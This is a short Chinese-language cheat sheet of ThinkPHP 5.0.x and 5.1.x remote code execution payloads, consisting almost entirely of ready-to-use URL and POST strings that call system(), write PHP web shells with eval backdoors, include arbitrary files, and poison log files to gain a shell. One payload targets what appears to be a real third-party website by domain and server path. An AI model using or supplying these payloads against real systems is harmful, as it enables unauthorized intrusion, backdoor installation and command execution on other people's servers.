5.1.x :
?s=index/\think\Request/input&filter[]=system&data=pwd?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
5.0.x :
?s=index/think\config/get&name=database.username # 获取配置信息?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
写入 shell
http://localhost:9096/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../shell.php&vars[1][]=<?php @eval($_REQUEST[cmd]);?>
# ThinkPHP <= 5.0.13POST /?s=index/indexs=whoami&_method=__construct&method=&filter[]=system# ThinkPHP <= 5.0.23、5.1.0 <= 5.1.16 需要开启框架app_debugPOST /_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al# ThinkPHP <= 5.0.23 需要存在xxx的method路由,例如captchaPOST /?s=xxx HTTP/1.1_method=__construct&filter[]=system&method=get&get[]=ls+-al_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls写shell进日志_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['x'])?>通过日志包含getshell_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../data/runtime/log/201901/21.log&x=phpinfo();提示call_user_func() expects parameter 1 to be a valid callback, function '<?php eval($_POST['x'])?>' not found or invalid function namehttp://dj.lzftah.com/?s=index_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/www/wwwroot/dj.lzftah.com/runtime/log/202203/05.log&x=phpinfo();
若有收获,就点个赞吧
0 人点赞
